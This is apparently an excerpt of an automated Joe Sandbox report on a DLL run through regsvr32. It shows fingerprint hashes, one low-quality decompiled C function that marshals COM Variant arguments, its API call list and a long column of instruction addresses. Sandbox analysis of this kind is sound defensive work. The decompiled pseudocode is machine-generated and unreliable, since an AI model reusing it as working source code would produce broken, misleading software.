                                                                                                                • API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
                                                                                                                • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                • API String ID: 1191297049-4034971020
                                                                                                                • Opcode ID: b54799d27170606899ff4ec85ba67eada30c06d86bff9faef27e8f29348c1080
                                                                                                                • Instruction ID: 7f2f15e19391607922dd917d31160da0776a06f29d3e743d5f2990234a6b7258
                                                                                                                • Opcode Fuzzy Hash: b54799d27170606899ff4ec85ba67eada30c06d86bff9faef27e8f29348c1080
                                                                                                                • Instruction Fuzzy Hash: 8061A175504A26AFDB11DB60CD89BAE7BB8EF08361F114195F905AB191DB34DEC0CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100169EF Relevance: 28.9, APIs: 19, Instructions: 423stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 46%
                                                                                                                			E100169EF(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t190;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t206;
				intOrPtr* _t208;
				intOrPtr _t211;
				char _t230;
				CHAR* _t236;
				intOrPtr _t237;
				signed short _t240;
				signed int _t241;
				signed int _t242;
				signed int _t250;
				signed int* _t257;
				signed int _t258;
				signed int _t277;
				signed short* _t278;
				signed short* _t279;
				signed int _t290;
				intOrPtr* _t293;
				CHAR* _t295;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int** _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t313;

				_push(0x7c);
				_t190 = E1003D1E6(E10052A1F, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
				_t257 = 0;
				if( *((intOrPtr*)(__ecx)) == 0) {
					L78:
					return E1003D2BE(_t190);
				}
				 *((intOrPtr*)(_t300 - 0x54)) = 0;
				 *((intOrPtr*)(_t300 - 0x50)) = 0;
				 *(_t300 - 0x4c) = 0;
				 *((intOrPtr*)(_t300 - 0x48)) = 0;
				 *(_t300 - 4) = 0;
				E1003BB70(__edi, _t300 - 0x54, 0, 0x10);
				_t302 = _t301 + 0xc;
				if( *(_t300 + 0x18) != 0) {
					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
				}
				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
					 *((intOrPtr*)(_t300 - 0x48)) = 1;
					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
				}
				 *((intOrPtr*)(_t300 - 0x68)) = 0x1005a004;
				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
				_t194 =  *(_t300 - 0x4c);
				_t308 =  *(_t300 - 0x4c) - _t257;
				 *(_t300 - 4) = 1;
				_t293 = 4;
				if( *(_t300 - 0x4c) == _t257) {
					L37:
					_t295 = 0;
					E1002A12B(_t300 - 0x44);
					if( *(_t300 + 0x10) != _t257) {
						_t295 = _t300 - 0x44;
					}
					E1003BB70(_t293, _t300 - 0x88, _t257, 0x20);
					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
					_t289 = _t300 - 0x54;
					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x1005fa04, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
					E100165E7(_t257, _t300 - 0x68, _t293, _t295);
					_t203 =  *(_t300 - 0x4c);
					if(_t203 == _t257) {
						L46:
						_push( *((intOrPtr*)(_t300 - 0x54)));
						E100160E7(_t257, _t293, _t295, _t319);
						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
						if( *(_t300 + 0xc) >= _t257) {
							L61:
							_t295 =  *(_t300 + 0x10);
							if(_t295 == _t257) {
								L76:
								 *(_t300 - 4) = 0;
								_t190 = E1001663E(_t300 - 0x68);
								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
								if(__eflags != 0) {
									_push( *((intOrPtr*)(_t300 - 0x54)));
									_t190 = E100160E7(_t257, _t293, _t295, __eflags);
								}
								goto L78;
							}
							if(_t295 == 0xc) {
								L65:
								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t206 - 0x13;
								if(_t206 > 0x13) {
									goto L76;
								}
								switch( *((intOrPtr*)(_t206 * 4 +  &M10016F7F))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 1:
										__eax =  *(__ebp + 0x14);
										__ecx =  *(__ebp - 0x3c);
										 *( *(__ebp + 0x14)) = __ecx;
										goto L76;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 4:
										__ecx =  *(__ebp - 0x3c);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x3c);
										__ecx =  *(__ebp - 0x38);
										 *(__eax + 4) = __ecx;
										goto L76;
									case 5:
										__eax = E1002C671(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
										_push( *(__ebp - 0x3c));
										__imp__#6();
										goto L76;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x3c) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *__ecx = __eflags != 0;
										goto L76;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x44;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										__ebx = 0;
										goto L76;
									case 8:
										goto L76;
									case 9:
										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
										goto L76;
								}
							}
							_t208 = _t300 - 0x44;
							__imp__#12(_t208, _t208, _t257, _t295);
							_t293 = _t208;
							_t321 = _t293 - _t257;
							if(_t293 >= _t257) {
								goto L65;
							}
							__imp__#9(_t300 - 0x44);
							_push(_t293);
							L49:
							E10017077(_t257, _t293, _t295, _t321);
							L50:
							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
							}
							_t211 = E100160BC(_t322, 0x20);
							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
							_t323 = _t211 - _t257;
							 *(_t300 - 4) = 4;
							if(_t211 != _t257) {
								_push( *((intOrPtr*)(_t300 - 0x88)));
								_push(_t257);
								_push(_t257);
								_t257 = E1002CE34(_t257, _t211, _t289, _t293, _t295, _t323);
							}
							_push( *((intOrPtr*)(_t300 - 0x84)));
							_t293 = __imp__#7;
							 *(_t300 - 4) = 1;
							if( *_t293() != 0) {
								_t139 = _t257 + 0x18; // 0x18
								E1001688F(_t139,  *((intOrPtr*)(_t300 - 0x84)));
							}
							_t296 = __imp__#6;
							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
							_push( *((intOrPtr*)(_t300 - 0x80)));
							if( *_t293() != 0) {
								_t143 = _t257 + 0xc; // 0xc
								E1001688F(_t143,  *((intOrPtr*)(_t300 - 0x80)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
							_push( *((intOrPtr*)(_t300 - 0x7c)));
							if( *_t293() != 0) {
								_t147 = _t257 + 0x14; // 0x14
								E1001688F(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
							E1003D2F0(_t300 + 0x14, 0x10065010);
							goto L61;
						}
						__imp__#9(_t300 - 0x44);
						_t321 =  *(_t300 + 0xc) - 0x80020009;
						if( *(_t300 + 0xc) == 0x80020009) {
							goto L50;
						}
						_push( *(_t300 + 0xc));
						goto L49;
					} else {
						_t295 =  *(_t300 + 0x18);
						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
						while(1) {
							_t319 =  *_t295;
							if( *_t295 == 0) {
								goto L46;
							}
							_t230 =  *_t295;
							__eflags = _t230 - 8;
							if(_t230 == 8) {
								L43:
								__imp__#9(_t293);
								L44:
								_t293 = _t293 - 0x10;
								_t295 =  &(_t295[1]);
								__eflags = _t295;
								continue;
							}
							__eflags = _t230 - 0xe;
							if(_t230 != 0xe) {
								goto L44;
							}
							goto L43;
						}
						goto L46;
					}
				} else {
					_t290 = 0x10;
					_t297 = E100160BC(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
					E1003BB70(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
					_t236 =  *(_t300 + 0x18);
					_t277 =  *(_t300 - 0x4c) << 4;
					_t302 = _t302 + 0x10;
					_t36 = _t277 - 0x10; // -16
					_t278 = _t297 + _t36;
					 *(_t300 - 0x14) = _t236;
					 *(_t300 - 0x10) = _t278;
					if( *_t236 == 0) {
						goto L37;
					}
					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
					_t299 =  &(_t278[4]);
					_t258 = _t237 - 4;
					 *(_t300 - 0x1c) = _t299;
					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
					do {
						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
						_t279 =  *(_t300 - 0x10);
						 *_t279 = _t240;
						if((_t240 & 0x00000040) != 0) {
							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
						}
						_t241 =  *_t279 & 0x0000ffff;
						_t313 = _t241 - 0x4002;
						if(_t313 > 0) {
							_t242 = _t241 - 0x4003;
							__eflags = _t242 - 0x12;
							if(__eflags > 0) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t242 * 4 +  &M10016F33))) {
								case 0:
									goto L34;
								case 1:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									_t244 =  *_t258;
									asm("sbb ecx, ecx");
									 *_t244 =  ~( *_t244) & 0x0000ffff;
									 *_t299 = _t244;
									_t245 = E10016255(_t300 - 0x34, _t244, _t244, 0);
									 *(_t300 - 4) = 3;
									E100167E7(_t258, _t300 - 0x68, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
									__eflags =  *(_t300 - 0x2c);
									 *(_t300 - 4) = 1;
									if(__eflags != 0) {
										_push( *((intOrPtr*)(_t300 - 0x34)));
										E100160E7(_t258, _t293, _t299, __eflags);
									}
									goto L35;
								case 2:
									goto L35;
							}
						} else {
							if(_t313 == 0) {
								L34:
								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
								_t258 = _t258 + _t293;
								__eflags = _t258;
								 *_t299 =  *_t258;
								goto L35;
							}
							_t250 = _t241;
							if(_t250 > 0x13) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t250 * 4 +  &M10016EE3))) {
								case 0:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__ax =  *__ebx;
									goto L28;
								case 1:
									goto L34;
								case 2:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 3:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 4:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									goto L17;
								case 5:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									 *(__ebp - 0x1c) = __eax;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if(__eflags == 0) {
										goto L35;
									}
									__eflags = __eax;
									if(__eflags != 0) {
										goto L35;
									}
									goto L23;
								case 6:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									 *__ebx =  ~( *__ebx);
									asm("sbb eax, eax");
									L28:
									 *__esi = __ax;
									goto L35;
								case 7:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
									__edi =  *(__ebp - 0x10);
									__ebx =  &(__ebx[1]);
									__esi =  *__ebx;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi =  *(__ebp - 0x1c);
									_push(4);
									_pop(__edi);
									goto L35;
								case 8:
									L24:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									__ecx = __ebp - 0x18;
									 *(__ebp - 0x1c) = __eax;
									__eax = E100169AB(__ebx, __ecx, __edi, __esi, __eflags);
									_push( *(__ebp - 0x18));
									 *((char*)(__ebp - 4)) = 2;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if( *(__ebp - 0x1c) == 0) {
										L26:
										__ecx =  *(__ebp - 0x18);
										__eax =  *(__ebp - 0x10);
										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
										 *( *(__ebp - 0x10)) = 8;
										 *((char*)(__ebp - 4)) = 1;
										__eax = E10001020(__ecx, __edx);
										goto L35;
									}
									__eflags = __eax;
									if(__eflags == 0) {
										L23:
										__eax = E1001726A(__ebx, __ecx, __edi, __esi, __eflags);
										goto L24;
									}
									goto L26;
								case 9:
									goto L35;
								case 0xa:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									 *_t299 =  *_t258;
									goto L35;
								case 0xb:
									__eax =  *(__ebp + 0x1c);
									__eax =  *(__ebp + 0x1c) + 8;
									 *(__ebp + 0x1c) = __eax;
									__ebx =  &(__ebx[2]);
									__eflags = __ebx;
									L17:
									__ecx =  *__eax;
									 *__esi = __ecx;
									 *(__esi + 4) = __eax;
									goto L35;
							}
						}
						L35:
						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
						_t299 = _t299 - 0x10;
						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
						 *(_t300 - 0x1c) = _t299;
					} while ( *( *(_t300 - 0x14)) != 0);
					_t257 = 0;
					goto L37;
				}
			}































                                                                                                                0x100169ef
                                                                                                                0x100169f6
                                                                                                                0x100169fb
                                                                                                                0x100169fe
                                                                                                                0x10016a02
                                                                                                                0x10016edb
                                                                                                                0x10016ee0
                                                                                                                0x10016ee0
                                                                                                                0x10016a08
                                                                                                                0x10016a0b
                                                                                                                0x10016a0e
                                                                                                                0x10016a11
                                                                                                                0x10016a1b
                                                                                                                0x10016a1e
                                                                                                                0x10016a23
                                                                                                                0x10016a29
                                                                                                                0x10016a34
                                                                                                                0x10016a34
                                                                                                                0x10016a3b
                                                                                                                0x10016a42
                                                                                                                0x10016a47
                                                                                                                0x10016a4e
                                                                                                                0x10016a4e
                                                                                                                0x10016a51
                                                                                                                0x10016a58
                                                                                                                0x10016a5b
                                                                                                                0x10016a5e
                                                                                                                0x10016a61
                                                                                                                0x10016a64
                                                                                                                0x10016a67
                                                                                                                0x10016a6b
                                                                                                                0x10016a6f
                                                                                                                0x10016a70
                                                                                                                0x10016c90
                                                                                                                0x10016c94
                                                                                                                0x10016c96
                                                                                                                0x10016c9f
                                                                                                                0x10016ca1
                                                                                                                0x10016ca1
                                                                                                                0x10016cae
                                                                                                                0x10016cb6
                                                                                                                0x10016cb8
                                                                                                                0x10016ccd
                                                                                                                0x10016ce4
                                                                                                                0x10016ce7
                                                                                                                0x10016cec
                                                                                                                0x10016cf1
                                                                                                                0x10016d1c
                                                                                                                0x10016d1c
                                                                                                                0x10016d1f
                                                                                                                0x10016d28
                                                                                                                0x10016d2b
                                                                                                                0x10016e00
                                                                                                                0x10016e00
                                                                                                                0x10016e06
                                                                                                                0x10016ebd
                                                                                                                0x10016ec0
                                                                                                                0x10016ec4
                                                                                                                0x10016ec9
                                                                                                                0x10016ecd
                                                                                                                0x10016ed0
                                                                                                                0x10016ed2
                                                                                                                0x10016ed5
                                                                                                                0x10016eda
                                                                                                                0x00000000
                                                                                                                0x10016ed0
                                                                                                                0x10016e10
                                                                                                                0x10016e35
                                                                                                                0x10016e38
                                                                                                                0x10016e3b
                                                                                                                0x10016e3e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016e40
                                                                                                                0x00000000
                                                                                                                0x10016e51
                                                                                                                0x10016e58
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016eb5
                                                                                                                0x10016eb8
                                                                                                                0x10016ebb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016e70
                                                                                                                0x10016e73
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016e7a
                                                                                                                0x10016e7d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016e5d
                                                                                                                0x10016e60
                                                                                                                0x10016e63
                                                                                                                0x10016e65
                                                                                                                0x10016e68
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016e87
                                                                                                                0x10016e8c
                                                                                                                0x10016e8f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016e97
                                                                                                                0x10016e9a
                                                                                                                0x10016e9c
                                                                                                                0x10016ea0
                                                                                                                0x10016ea3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016ea7
                                                                                                                0x10016eaa
                                                                                                                0x10016ead
                                                                                                                0x10016eae
                                                                                                                0x10016eaf
                                                                                                                0x10016eb0
                                                                                                                0x10016eb1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016e4d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016e40
                                                                                                                0x10016e14
                                                                                                                0x10016e19
                                                                                                                0x10016e1f
                                                                                                                0x10016e21
                                                                                                                0x10016e23
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016e29
                                                                                                                0x10016e2f
                                                                                                                0x10016d47
                                                                                                                0x10016d47
                                                                                                                0x10016d4c
                                                                                                                0x10016d4c
                                                                                                                0x10016d4f
                                                                                                                0x10016d58
                                                                                                                0x10016d58
                                                                                                                0x10016d5d
                                                                                                                0x10016d63
                                                                                                                0x10016d66
                                                                                                                0x10016d68
                                                                                                                0x10016d6c
                                                                                                                0x10016d6e
                                                                                                                0x10016d76
                                                                                                                0x10016d77
                                                                                                                0x10016d7d
                                                                                                                0x10016d7d
                                                                                                                0x10016d7f
                                                                                                                0x10016d85
                                                                                                                0x10016d8b
                                                                                                                0x10016d93
                                                                                                                0x10016d9b
                                                                                                                0x10016d9e
                                                                                                                0x10016d9e
                                                                                                                0x10016da9
                                                                                                                0x10016daf
                                                                                                                0x10016db1
                                                                                                                0x10016db8
                                                                                                                0x10016dbd
                                                                                                                0x10016dc0
                                                                                                                0x10016dc0
                                                                                                                0x10016dc8
                                                                                                                0x10016dca
                                                                                                                0x10016dd1
                                                                                                                0x10016dd6
                                                                                                                0x10016dd9
                                                                                                                0x10016dd9
                                                                                                                0x10016de1
                                                                                                                0x10016de6
                                                                                                                0x10016dec
                                                                                                                0x10016df8
                                                                                                                0x10016dfb
                                                                                                                0x00000000
                                                                                                                0x10016dfb
                                                                                                                0x10016d35
                                                                                                                0x10016d3b
                                                                                                                0x10016d42
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016d44
                                                                                                                0x00000000
                                                                                                                0x10016cf3
                                                                                                                0x10016cf6
                                                                                                                0x10016cfc
                                                                                                                0x10016d17
                                                                                                                0x10016d17
                                                                                                                0x10016d1a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016d02
                                                                                                                0x10016d04
                                                                                                                0x10016d06
                                                                                                                0x10016d0c
                                                                                                                0x10016d0d
                                                                                                                0x10016d13
                                                                                                                0x10016d13
                                                                                                                0x10016d16
                                                                                                                0x10016d16
                                                                                                                0x00000000
                                                                                                                0x10016d16
                                                                                                                0x10016d08
                                                                                                                0x10016d0a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016d0a
                                                                                                                0x00000000
                                                                                                                0x10016d17
                                                                                                                0x10016a76
                                                                                                                0x10016a7a
                                                                                                                0x10016a8a
                                                                                                                0x10016a95
                                                                                                                0x10016a98
                                                                                                                0x10016aa0
                                                                                                                0x10016aa3
                                                                                                                0x10016aa6
                                                                                                                0x10016aac
                                                                                                                0x10016aac
                                                                                                                0x10016ab0
                                                                                                                0x10016ab3
                                                                                                                0x10016ab6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016abc
                                                                                                                0x10016ac1
                                                                                                                0x10016ac4
                                                                                                                0x10016aca
                                                                                                                0x10016acd
                                                                                                                0x10016ad0
                                                                                                                0x10016ad3
                                                                                                                0x10016ad9
                                                                                                                0x10016adc
                                                                                                                0x10016adf
                                                                                                                0x10016ae9
                                                                                                                0x10016ae9
                                                                                                                0x10016aec
                                                                                                                0x10016af4
                                                                                                                0x10016af6
                                                                                                                0x10016c13
                                                                                                                0x10016c18
                                                                                                                0x10016c1b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016c1d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016c24
                                                                                                                0x10016c27
                                                                                                                0x10016c29
                                                                                                                0x10016c2f
                                                                                                                0x10016c39
                                                                                                                0x10016c40
                                                                                                                0x10016c42
                                                                                                                0x10016c4e
                                                                                                                0x10016c52
                                                                                                                0x10016c57
                                                                                                                0x10016c5b
                                                                                                                0x10016c5f
                                                                                                                0x10016c61
                                                                                                                0x10016c64
                                                                                                                0x10016c69
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016afc
                                                                                                                0x10016afc
                                                                                                                0x10016c6c
                                                                                                                0x10016c6c
                                                                                                                0x10016c6f
                                                                                                                0x10016c6f
                                                                                                                0x10016c73
                                                                                                                0x00000000
                                                                                                                0x10016c73
                                                                                                                0x10016b03
                                                                                                                0x10016b07
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016b0d
                                                                                                                0x00000000
                                                                                                                0x10016b22
                                                                                                                0x10016b25
                                                                                                                0x10016b27
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016b4a
                                                                                                                0x10016b4e
                                                                                                                0x10016b53
                                                                                                                0x10016b56
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016b5d
                                                                                                                0x10016b61
                                                                                                                0x10016b66
                                                                                                                0x10016b69
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016b70
                                                                                                                0x10016b73
                                                                                                                0x10016b75
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016b79
                                                                                                                0x10016b7c
                                                                                                                0x10016b7e
                                                                                                                0x10016b80
                                                                                                                0x10016b81
                                                                                                                0x10016b84
                                                                                                                0x10016b8a
                                                                                                                0x10016b8e
                                                                                                                0x10016b90
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016b96
                                                                                                                0x10016b98
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016beb
                                                                                                                0x10016bee
                                                                                                                0x10016bf2
                                                                                                                0x10016bf4
                                                                                                                0x10016bf6
                                                                                                                0x10016bf6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016bfb
                                                                                                                0x10016bff
                                                                                                                0x10016c02
                                                                                                                0x10016c05
                                                                                                                0x10016c07
                                                                                                                0x10016c08
                                                                                                                0x10016c09
                                                                                                                0x10016c0a
                                                                                                                0x10016c0b
                                                                                                                0x10016c0e
                                                                                                                0x10016c10
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016ba3
                                                                                                                0x10016ba3
                                                                                                                0x10016ba6
                                                                                                                0x10016ba8
                                                                                                                0x10016baa
                                                                                                                0x10016bab
                                                                                                                0x10016bae
                                                                                                                0x10016bb1
                                                                                                                0x10016bb6
                                                                                                                0x10016bb9
                                                                                                                0x10016bbd
                                                                                                                0x10016bc3
                                                                                                                0x10016bc7
                                                                                                                0x10016bc9
                                                                                                                0x10016bcf
                                                                                                                0x10016bcf
                                                                                                                0x10016bd2
                                                                                                                0x10016bd5
                                                                                                                0x10016bd8
                                                                                                                0x10016bdd
                                                                                                                0x10016be1
                                                                                                                0x00000000
                                                                                                                0x10016be1
                                                                                                                0x10016bcb
                                                                                                                0x10016bcd
                                                                                                                0x10016b9e
                                                                                                                0x10016b9e
                                                                                                                0x00000000
                                                                                                                0x10016b9e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016b14
                                                                                                                0x10016b17
                                                                                                                0x10016b1b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016b2f
                                                                                                                0x10016b32
                                                                                                                0x10016b35
                                                                                                                0x10016b38
                                                                                                                0x10016b38
                                                                                                                0x10016b3b
                                                                                                                0x10016b3b
                                                                                                                0x10016b3d
                                                                                                                0x10016b42
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016b0d
                                                                                                                0x10016c75
                                                                                                                0x10016c75
                                                                                                                0x10016c79
                                                                                                                0x10016c7c
                                                                                                                0x10016c85
                                                                                                                0x10016c85
                                                                                                                0x10016c8e
                                                                                                                0x00000000
                                                                                                                0x10016c8e

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 100169F6
                                                                                                                • _memset.LIBCMT ref: 10016A1E
                                                                                                                • lstrlenA.KERNEL32(?,?,?,10058618,00000000,10056948,00000000), ref: 10016A2E
                                                                                                                • _memset.LIBCMT ref: 10016A98
                                                                                                                • _memset.LIBCMT ref: 10016CAE
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10016D0D
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10016D35
                                                                                                                • SysStringLen.OLEAUT32(?), ref: 10016D8F
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 10016DAF
                                                                                                                • SysStringLen.OLEAUT32(?), ref: 10016DB4
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 10016DC8
                                                                                                                • SysStringLen.OLEAUT32(?), ref: 10016DCD
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 10016DE1
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10016DFB
                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 10016E19
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10016E29
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4128688680-0
                                                                                                                • Opcode ID: 4ce08456f36365bcf7ba3eaf88c4784b5c5e83f4cc52fa4ffad0f5750cffa731
                                                                                                                • Instruction ID: 319c792b0ddf46419fd0bf15a8d232bbccb348bd983ffdde71d77faf5b4a9c61
                                                                                                                • Opcode Fuzzy Hash: 4ce08456f36365bcf7ba3eaf88c4784b5c5e83f4cc52fa4ffad0f5750cffa731
                                                                                                                • Instruction Fuzzy Hash: A6F177B5900249DFDF10CFA8DC80AAEBBB4FF09300F508469E951AB2A0DB35DA95CF51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10010570 Relevance: 28.5, APIs: 14, Strings: 2, Instructions: 492windowthreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
